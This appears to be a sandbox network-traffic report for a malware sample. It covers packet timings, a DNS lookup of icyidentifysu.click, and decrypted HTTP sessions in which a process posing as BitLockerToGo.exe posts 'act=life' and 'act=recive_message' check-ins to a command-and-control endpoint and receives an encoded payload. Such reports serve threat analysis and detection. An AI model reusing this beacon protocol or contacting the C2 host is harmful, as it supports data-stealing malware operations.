Dec 24, 2024 02:56:42.324744940 CET | 49759 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:42.325206995 CET | 49759 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:42.325222015 CET | 443 | 49759 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:43.540719032 CET | 443 | 49759 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:43.540783882 CET | 49759 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:43.542107105 CET | 49759 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:43.542121887 CET | 443 | 49759 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:43.542335033 CET | 443 | 49759 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:43.543488026 CET | 49759 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:43.543678045 CET | 49759 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:43.543709040 CET | 443 | 49759 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:43.543791056 CET | 49759 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:43.543811083 CET | 443 | 49759 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:44.790678978 CET | 443 | 49759 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:44.790766001 CET | 443 | 49759 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:44.790911913 CET | 49759 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:44.791040897 CET | 49759 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:44.791055918 CET | 443 | 49759 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:45.141987085 CET | 49765 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:45.142081976 CET | 443 | 49765 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:45.142167091 CET | 49765 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:45.142524004 CET | 49765 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:45.142563105 CET | 443 | 49765 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:46.356684923 CET | 443 | 49765 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:46.356781006 CET | 49765 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:46.358197927 CET | 49765 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:46.358207941 CET | 443 | 49765 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:46.358531952 CET | 443 | 49765 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:46.359853029 CET | 49765 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:46.359972000 CET | 49765 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:46.359977961 CET | 443 | 49765 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:47.168437958 CET | 443 | 49765 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:47.168555021 CET | 443 | 49765 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:47.168627977 CET | 49765 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:47.168742895 CET | 49765 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:47.168788910 CET | 443 | 49765 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:47.661575079 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:47.661606073 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:47.661679029 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:47.662017107 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:47.662033081 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:48.876091003 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:48.876162052 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.877439976 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.877454996 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:48.877775908 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:48.879275084 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.880033016 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.880069971 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:48.880170107 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.880204916 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:48.880306005 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.880369902 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:48.880481958 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.880506039 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:48.880631924 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.880656958 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:48.880800962 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.880825043 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:48.880848885 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.881083965 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.881114006 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.923337936 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:48.923485994 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.923532963 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.923547029 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.971332073 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:48.971599102 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.971643925 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:48.971669912 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:49.015360117 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:49.018261909 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:49.059334993 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:49.240740061 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:51.286396027 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:51.286498070 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:51.286566973 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:51.286675930 CET | 49771 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:51.286688089 CET | 443 | 49771 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:51.322452068 CET | 49781 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:51.322489023 CET | 443 | 49781 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:51.322593927 CET | 49781 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:51.322906971 CET | 49781 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:51.322921038 CET | 443 | 49781 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:52.541307926 CET | 443 | 49781 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:52.541408062 CET | 49781 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:52.542773008 CET | 49781 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:52.542785883 CET | 443 | 49781 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:52.543132067 CET | 443 | 49781 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:56:52.544365883 CET | 49781 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:52.544406891 CET | 49781 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:56:52.544452906 CET | 443 | 49781 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:57:00.470799923 CET | 443 | 49781 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:57:00.470921040 CET | 443 | 49781 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:57:00.471129894 CET | 49781 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:57:00.471340895 CET | 49781 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:57:00.471349955 CET | 443 | 49781 | 104.21.29.252 | 192.168.2.5
Dec 24, 2024 02:57:00.471375942 CET | 49781 | 443 | 192.168.2.5 | 104.21.29.252
Dec 24, 2024 02:57:00.471379995 CET | 443 | 49781 | 104.21.29.252 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 02:56:30.356976986 CET | 58093 | 53 | 192.168.2.5 | 1.1.1.1
Dec 24, 2024 02:56:30.684155941 CET | 53 | 58093 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 02:56:30.356976986 CET | 192.168.2.5 | 1.1.1.1 | 0xf849 | Standard query (0) | icyidentifysu.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 02:56:30.684155941 CET | 1.1.1.1 | 192.168.2.5 | 0xf849 | No error (0) | icyidentifysu.click |  | 104.21.29.252 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 02:56:30.684155941 CET | 1.1.1.1 | 192.168.2.5 | 0xf849 | No error (0) | icyidentifysu.click |  | 172.67.150.24 | A (IP address) | IN (0x0001) | false
                                                                                  • icyidentifysu.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49725 | 104.21.29.252 | 443 | 5448 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 01:56:32 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: icyidentifysu.click
2024-12-24 01:56:32 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-24 01:56:33 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 01:56:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=voreunmcrhfpv7461qohrrl6rk; expires=Fri, 18 Apr 2025 19:43:11 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pY5OPHKx3ZhQ3usKwKD1OIC9q%2BLjuV4PV%2FmGp7jtODxAa5JcQArUZneqj6Izr9rsTCqtaXsLqV%2FRxeoEjV1Mc%2FsKNMdTymAObrNzOhKLnFp0nFwTGRfqQxBqGB3kxZ1BFKdnBYc2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6cf9b6ab5d43ef-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1612&rtt_var=710&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2852&recv_bytes=910&delivery_rate=1811414&cwnd=237&unsent_bytes=0&cid=7320840f61a30c0a&ts=1115&x=0"
2024-12-24 01:56:33 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-24 01:56:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49736 | 104.21.29.252 | 443 | 5448 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 01:56:34 UTC | 267 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 54
Host: icyidentifysu.click
2024-12-24 01:56:34 UTC | 54 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 69 79 63 70 6a 6e 61 66 73 63 66 7a 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--iycpjnafscfz&j=
2024-12-24 01:56:35 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 01:56:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8o2tmq9mtl4cr59p43bj7sl1ic; expires=Fri, 18 Apr 2025 19:43:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fG8p5FXK03M0RNVX0zjy2YEcO%2FaaoCFNC%2BrwRA3D0XFrwDfBu7X4ooTPw3nJgLYvb8tYGz56tV4nWMrpI8yHoeOgY1%2FEe%2F9IoaYblFTs8OHoVCrwV%2FIyWSICmxQWNOz3K6mIxLIr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6cf9c3bc0aef9f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1772&rtt_var=678&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=957&delivery_rate=1596500&cwnd=216&unsent_bytes=0&cid=5af8539bcc5e33af&ts=790&x=0"
2024-12-24 01:56:35 UTC | 240 | IN | Data Raw: 34 36 64 0d 0a 33 54 39 50 4b 35 41 6f 41 6e 79 4f 4e 33 56 66 54 6f 6d 63 72 54 72 63 34 6e 50 46 75 50 79 72 49 56 63 78 47 71 62 32 66 41 57 6d 48 54 6b 4a 71 68 77 75 58 76 31 53 56 32 55 36 2b 2b 6e 49 46 76 36 44 46 2b 65 43 6d 73 70 4e 4a 46 51 32 68 49 41 52 4a 2b 64 5a 4c 6b 66 6a 54 53 35 65 36 30 39 58 5a 52 58 79 76 73 68 55 2f 74 68 52 6f 4e 4b 65 79 6b 30 31 55 48 48 4a 68 68 42 6d 74 56 4d 6f 51 2f 56 4c 5a 68 33 69 57 68 41 36 4b 2b 6a 32 77 31 4f 78 69 68 37 6e 6c 4e 37 4f 57 33 55 4c 4f 4f 75 54 43 47 53 51 58 6a 78 41 73 6c 55 75 42 36 78 53 47 33 31 30 71 2f 33 49 57 4c 43 45 46 36 37 51 6c 4d 4e 46 4e 46 56 77 31 70 38 61 62 62 56 64 4b 30 4c 2f 51 6e 49 51 36 46 30 62 50 43 48 6f 76 6f 45
Data Ascii: 46d3T9PK5AoAnyON3VfTomcrTrc4nPFuPyrIVcxGqb2fAWmHTkJqhwuXv1SV2U6++nIFv6DF+eCmspNJFQ2hIARJ+dZLkfjTS5e609XZRXyvshU/thRoNKeyk01UHHJhhBmtVMoQ/VLZh3iWhA6K+j2w1Oxih7nlN7OW3ULOOuTCGSQXjxAslUuB6xSG310q/3IWLCEF67QlMNFNFVw1p8abbVdK0L/QnIQ6F0bPCHovoE
2024-12-24 01:56:35 UTC | 900 | IN | Data Raw: 59 75 5a 68 52 2f 35 72 4e 2b 30 41 6b 51 6d 33 4a 68 42 67 6e 6f 42 4d 30 43 66 56 47 49 45 61 73 58 52 73 7a 4b 65 6a 78 79 46 6d 2b 6b 68 36 6e 32 5a 62 42 52 7a 39 63 64 38 75 61 46 47 43 33 56 43 70 47 39 55 4a 6d 45 65 38 56 57 58 30 72 38 37 36 58 47 4a 36 51 45 71 54 4f 6b 39 67 44 4b 68 31 68 68 4a 4d 53 4a 2b 63 64 4b 30 66 7a 52 32 41 4d 35 46 34 63 4f 44 37 67 39 38 4a 56 76 6f 30 62 71 4e 6d 65 7a 6b 6b 2f 58 48 4c 41 6d 52 4e 68 76 31 31 74 42 37 4a 4e 65 46 36 30 46 54 51 34 50 4f 7a 79 32 52 71 45 77 41 37 70 77 39 37 4f 54 33 55 4c 4f 4d 79 52 48 57 53 30 55 69 35 42 2b 56 68 67 44 4f 70 59 45 69 38 71 37 76 44 46 57 36 79 4b 48 36 48 5a 6c 38 4a 4b 4d 46 52 38 68 4e 70 65 59 4b 63 64 64 51 6e 54 52 32 73 53 35 6b 49 58 66 54 4f 6c 35 34
Data Ascii: YuZhR/5rN+0AkQm3JhBgnoBM0CfVGIEasXRszKejxyFm+kh6n2ZbBRz9cd8uaFGC3VCpG9UJmEe8VWX0r876XGJ6QEqTOk9gDKh1hhJMSJ+cdK0fzR2AM5F4cOD7g98JVvo0bqNmezkk/XHLAmRNhv11tB7JNeF60FTQ4POzy2RqEwA7pw97OT3ULOMyRHWS0Ui5B+VhgDOpYEi8q7vDFW6yKH6HZl8JKMFR8hNpeYKcddQnTR2sS5kIXfTOl54
2024-12-24 01:56:35 UTC | 1369 | IN | Data Raw: 34 34 61 66 0d 0a 49 63 48 35 38 58 51 30 41 4d 79 58 7a 69 63 31 42 46 6f 73 46 55 74 53 50 5a 48 5a 42 2f 68 57 52 34 2b 49 4f 66 32 77 6c 53 36 6a 78 6d 76 32 5a 62 62 54 54 74 56 66 73 53 52 58 69 6e 2f 57 6a 55 4a 71 67 70 45 45 50 74 42 48 48 38 5a 36 50 44 42 58 36 6a 41 44 75 6e 44 33 73 35 50 64 51 73 34 79 70 6b 56 61 37 68 55 4c 45 72 79 51 47 34 52 35 6c 30 66 50 53 48 71 39 63 64 65 73 34 73 65 71 4e 32 57 79 6b 38 77 58 6e 75 45 32 6c 35 67 70 78 31 31 43 64 64 45 59 77 2f 39 46 79 49 2b 49 75 58 35 32 52 69 68 7a 67 6a 6e 33 5a 4b 4a 47 33 56 5a 66 38 4f 51 45 32 32 38 57 53 6c 45 2f 55 4e 70 46 2f 35 66 47 7a 4d 2b 35 76 54 4b 56 72 4b 46 48 71 66 62 6e 38 64 4a 50 68 4d 32 68 4a 4d 47 4a 2b 63 64 41 6b 54 69 57 47 6f 56 2f 52 63 69 50 69
Data Ascii: 44afIcH58XQ0AMyXzic1BFosFUtSPZHZB/hWR4+IOf2wlS6jxmv2ZbbTTtVfsSRXin/WjUJqgpEEPtBHH8Z6PDBX6jADunD3s5PdQs4ypkVa7hULEryQG4R5l0fPSHq9cdes4seqN2Wyk8wXnuE2l5gpx11CddEYw/9FyI+IuX52Rihzgjn3ZKJG3VZf8OQE228WSlE/UNpF/5fGzM+5vTKVrKFHqfbn8dJPhM2hJMGJ+cdAkTiWGoV/RciPi
2024-12-24 01:56:35 UTC | 1369 | IN | Data Raw: 47 4a 47 44 42 36 32 61 67 59 64 61 64 56 52 30 68 4d 78 65 62 62 4e 5a 4c 6b 58 37 52 6d 30 66 36 46 49 61 4f 53 7a 74 2b 4d 70 5a 74 59 67 64 71 4e 43 53 7a 55 38 38 56 58 54 48 6c 78 67 6e 38 52 30 71 55 62 49 53 49 44 2f 68 58 68 73 39 4c 2f 72 35 6a 78 62 2b 6a 68 65 6e 6d 73 62 66 55 79 4a 55 5a 34 71 4e 58 6d 43 7a 48 58 55 4a 2b 46 68 6c 45 4f 68 66 45 6a 6b 67 34 66 37 4b 53 72 61 47 46 71 76 53 6d 38 5a 46 4d 46 35 2f 7a 35 63 4d 64 62 78 5a 49 30 57 79 42 43 41 5a 39 42 56 50 66 51 6e 38 2f 64 39 65 76 63 41 4f 36 63 50 65 7a 6b 39 31 43 7a 6a 45 6d 68 4a 73 75 46 59 6d 54 66 5a 4b 62 52 58 69 57 78 34 78 4a 4f 66 35 33 56 57 37 69 42 75 75 33 35 4c 45 51 43 64 51 65 59 54 61 58 6d 43 6e 48 58 55 4a 31 58 6c 58 50 61 78 4b 57 53 52 73 37 50 4b
Data Ascii: GJGDB62agYdadVR0hMxebbNZLkX7Rm0f6FIaOSzt+MpZtYgdqNCSzU88VXTHlxgn8R0qUbISID/hXhs9L/r5jxb+jhenmsbfUyJUZ4qNXmCzHXUJ+FhlEOhfEjkg4f7KSraGFqvSm8ZFMF5/z5cMdbxZI0WyBCAZ9BVPfQn8/d9evcAO6cPezk91CzjEmhJsuFYmTfZKbRXiWx4xJOf53VW7iBuu35LEQCdQeYTaXmCnHXUJ1XlXPaxKWSRs7PK
2024-12-24 01:56:35 UTC | 1369 | IN | Data Raw: 42 4b 6f 30 64 37 57 44 53 77 54 66 38 6a 55 52 69 65 34 56 53 56 48 38 55 78 72 45 75 42 55 48 6a 73 70 34 2f 6e 41 58 37 65 48 45 61 48 49 6d 63 52 4b 4e 56 68 78 7a 70 41 66 62 50 38 54 62 55 37 71 43 6a 68 65 33 6c 49 42 4c 53 2b 72 34 59 46 42 2f 6f 63 64 35 34 4c 65 78 46 45 30 56 6d 72 41 6d 78 56 31 74 46 73 74 54 4f 42 4e 62 42 54 6a 56 68 38 77 4c 2b 50 73 7a 31 57 2b 6b 67 4f 68 30 5a 43 4a 44 58 56 55 59 49 54 4d 58 6c 61 6f 56 6d 31 57 76 46 4d 67 47 65 41 56 54 33 30 76 34 66 50 42 53 72 71 47 47 71 54 55 6c 73 78 4c 4d 56 6c 31 79 35 38 55 62 72 64 64 49 6b 7a 36 51 57 59 51 37 56 4d 62 4d 47 79 6c 76 73 68 41 2f 74 68 52 67 4d 43 54 7a 31 51 6b 5a 6e 2f 45 78 56 35 34 38 55 52 74 54 76 34 4b 4f 46 37 68 57 52 30 77 4b 65 2f 32 79 46 75 2f
Data Ascii: BKo0d7WDSwTf8jURie4VSVH8UxrEuBUHjsp4/nAX7eHEaHImcRKNVhxzpAfbP8TbU7qCjhe3lIBLS+r4YFB/ocd54LexFE0VmrAmxV1tFstTOBNbBTjVh8wL+Psz1W+kgOh0ZCJDXVUYITMXlaoVm1WvFMgGeAVT30v4fPBSrqGGqTUlsxLMVl1y58UbrddIkz6QWYQ7VMbMGylvshA/thRgMCTz1QkZn/ExV548URtTv4KOF7hWR0wKe/2yFu/
2024-12-24 01:56:35 UTC | 1369 | IN | Data Raw: 32 53 69 52 74 31 58 58 58 43 6c 52 39 76 74 31 30 72 51 2f 5a 4a 61 52 33 72 58 42 45 32 4c 2b 48 78 79 46 36 36 67 42 71 67 31 4a 6a 4d 53 44 77 54 4e 6f 53 54 42 69 66 6e 48 51 74 71 34 46 68 53 45 4f 39 4f 56 79 4a 69 38 72 37 49 56 50 37 59 55 61 7a 53 6b 64 74 47 50 46 74 38 7a 5a 51 61 62 62 4a 61 4c 55 7a 2f 54 32 51 51 36 46 49 58 4d 53 50 73 39 73 42 63 76 6f 39 52 36 5a 71 5a 30 51 4e 74 45 31 6a 50 67 6a 39 70 74 45 39 74 56 72 78 54 49 42 6e 67 46 55 39 39 49 75 4c 2f 78 31 61 79 69 42 57 31 32 70 58 41 54 44 52 63 65 4d 65 56 46 47 2b 74 57 79 31 43 2b 6b 31 6f 47 75 4a 48 46 6a 4a 73 70 62 37 49 51 50 37 59 55 5a 62 4d 6d 63 35 4d 64 33 70 2f 33 35 55 55 5a 4c 52 52 62 56 61 38 55 79 41 5a 34 42 56 50 66 53 48 6e 38 38 74 4b 73 6f 41 52 72
Data Ascii: 2SiRt1XXXClR9vt10rQ/ZJaR3rXBE2L+HxyF66gBqg1JjMSDwTNoSTBifnHQtq4FhSEO9OVyJi8r7IVP7YUazSkdtGPFt8zZQabbJaLUz/T2QQ6FIXMSPs9sBcvo9R6ZqZ0QNtE1jPgj9ptE9tVrxTIBngFU99IuL/x1ayiBW12pXATDRceMeVFG+tWy1C+k1oGuJHFjJspb7IQP7YUZbMmc5Md3p/35UUZLRRbVa8UyAZ4BVPfSHn88tKsoARr
2024-12-24 01:56:35 UTC | 1369 | IN | Data Raw: 49 4f 31 5a 35 79 4a 34 5a 61 61 31 63 4a 30 58 7a 54 57 63 56 2f 6c 34 46 4e 69 54 6f 38 4d 64 52 76 6f 34 52 70 74 65 65 69 51 31 31 56 47 43 45 7a 46 35 43 6e 45 6f 37 51 37 42 70 64 77 6a 6d 55 68 73 72 4a 2b 72 39 32 56 57 75 77 46 2f 6e 79 35 6e 59 41 32 31 46 61 4e 4f 54 41 53 6d 6d 48 53 70 46 73 68 49 67 46 65 4e 62 47 6a 59 6f 34 76 76 48 57 37 75 46 47 36 76 57 6e 38 46 4b 50 31 5a 39 77 70 34 64 61 62 42 63 49 55 33 37 52 47 6c 65 6f 68 55 51 4a 57 79 7a 76 76 6c 49 75 5a 67 63 74 35 69 73 79 6c 49 6b 52 6e 58 55 6b 6c 78 49 76 46 45 75 54 50 56 61 49 41 47 69 54 46 63 36 49 4b 75 6d 6a 31 69 36 6a 42 4b 67 31 4a 48 45 54 44 4a 59 64 38 36 61 44 47 69 36 56 53 46 42 2f 31 68 71 46 50 35 63 48 6a 41 69 34 2b 7a 4d 47 50 44 41 46 72 2b 61 78 6f
Data Ascii: IO1Z5yJ4Zaa1cJ0XzTWcV/l4FNiTo8MdRvo4RpteeiQ11VGCEzF5CnEo7Q7BpdwjmUhsrJ+r92VWuwF/ny5nYA21FaNOTASmmHSpFshIgFeNbGjYo4vvHW7uFG6vWn8FKP1Z9wp4dabBcIU37RGleohUQJWyzvvlIuZgct5isylIkRnXUklxIvFEuTPVaIAGiTFc6IKumj1i6jBKg1JHETDJYd86aDGi6VSFB/1hqFP5cHjAi4+zMGPDAFr+axo
2024-12-24 01:56:35 UTC | 1369 | IN | Data Raw: 53 64 4b 5a 44 6d 53 36 57 68 4e 33 2f 45 31 30 47 65 4a 54 46 33 31 69 71 2f 47 50 41 49 66 41 57 65 66 6c 30 49 6c 62 64 51 73 34 38 5a 63 51 61 62 68 4c 50 41 54 52 58 58 59 55 39 78 63 78 4f 6a 33 69 36 4d 4a 4b 2f 73 35 52 6f 5a 72 47 6d 51 31 31 56 32 6d 45 7a 45 34 31 35 41 68 2b 48 71 49 59 66 31 44 31 46 51 46 39 64 4c 6d 77 6a 30 72 2b 32 46 48 67 32 59 7a 62 52 54 5a 46 65 34 4f 71 49 45 65 30 53 79 78 45 2b 55 5a 65 49 50 6c 57 47 54 4d 72 2f 65 2b 50 46 76 36 50 55 66 2f 6a 33 6f 45 44 43 68 30 34 33 4e 52 47 4a 34 70 65 49 30 66 31 58 48 46 54 7a 46 34 42 50 43 48 67 38 6f 31 5a 73 35 41 57 35 35 54 65 7a 77 4e 74 41 7a 61 45 6b 41 38 6e 35 77 31 2f 45 71 63 5a 4e 30 36 2b 53 6c 6b 6b 62 50 32 2b 6c 77 72 77 77 41 50 6e 67 74 36 4f 51 43 64
Data Ascii: SdKZDmS6WhN3/E10GeJTF31iq/GPAIfAWefl0IlbdQs48ZcQabhLPATRXXYU9xcxOj3i6MJK/s5RoZrGmQ11V2mEzE415Ah+HqIYf1D1FQF9dLmwj0r+2FHg2YzbRTZFe4OqIEe0SyxE+UZeIPlWGTMr/e+PFv6PUf/j3oEDCh043NRGJ4peI0f1XHFTzF4BPCHg8o1Zs5AW55TezwNtAzaEkA8n5w1/EqcZN06+SlkkbP2+lwrwwAPngt6OQCd
